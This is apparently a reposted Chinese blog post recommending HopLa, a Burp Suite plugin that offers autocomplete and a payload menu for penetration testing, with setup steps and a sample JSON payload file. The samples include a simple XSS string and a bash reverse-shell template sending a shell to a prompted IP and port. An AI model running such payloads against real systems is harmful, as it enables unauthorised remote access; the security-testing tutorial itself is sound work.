今日Burp工具推荐之HopLa,HopLa Burp Suite Extender插件-在Burp Suite中添加自动完成支持和有用的有效负载
加载方式跟其他bp插件无异
- 从release目录下载jar文件
- 使用Extender选项卡将其添加到Burp Suite
默认情况下,HopLa附带默认的有效载荷。您可以通过在菜单中加载自定义JSON文件来添加您的JSON文件。
在第一次使用时,HopLa创建一个JSON文件,其中包含jar文件目录中的所有有效负载。
按Ctrl+Q
显示有效负载库菜单。
您可以在顶部菜单中禁用全局自动完成。
对于i3,将以下行添加到浮动帧的$HOME/.config/i3/config
:
for_window [
class
=
".*burp-StartBurp.*"
title=
"^ $"
] floating enable
如何添加有效载荷
{
"categories"
: [
{
"name"
:
"XSS"
,
"values"
: [
{
"name"
:
"Simple"
,
"value"
:
"<script>alert(1)</script>"
},
{
"name"
:
"Multiline"
,
"value"
:
"AAAAnBBBB"
},
{
"name"
:
"Nested XSS menu"
,
"values"
: [
{
"name"
:
"Simple 2"
,
"value"
:
"<script>alert(1)</script>"
}
]
}
]
}
],
"keywords"
: [
{
"name"
:
"Headers"
,
"values"
: [
"X-Forwarded-For"
,
"X-Originally-Forwarded-For"
,
"X-Originating-Ip"
,
"X-Originating-IP"
]
}
]
}
您可以自动添加提示对话框:
{
"name"
:
"Bash UDP"
,
"value"
:
"sh -i >& /dev/udp/§IP§/§PORT§ 0>&1"
,
"prompt"
: [
"IP"
,
"PORT"
]
},
若要仅添加未出现在菜单中的关键字,您可以将其添加到关键字类别中:
{
"keywords"
: [
{
"name"
:
"Headers"
,
"values"
: [
"X-Forwarded-For"
,
"X-Originally-Forwarded-For"
,
"X-Originating-Ip"
,
"X-Originating-IP"
]
}
]
}
下载地址
https://github.com/synacktiv/HopLa
原文始发于微信公众号(扫地僧的茶饭日常):[工具篇] BurpSuite插件-HopLa推荐
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论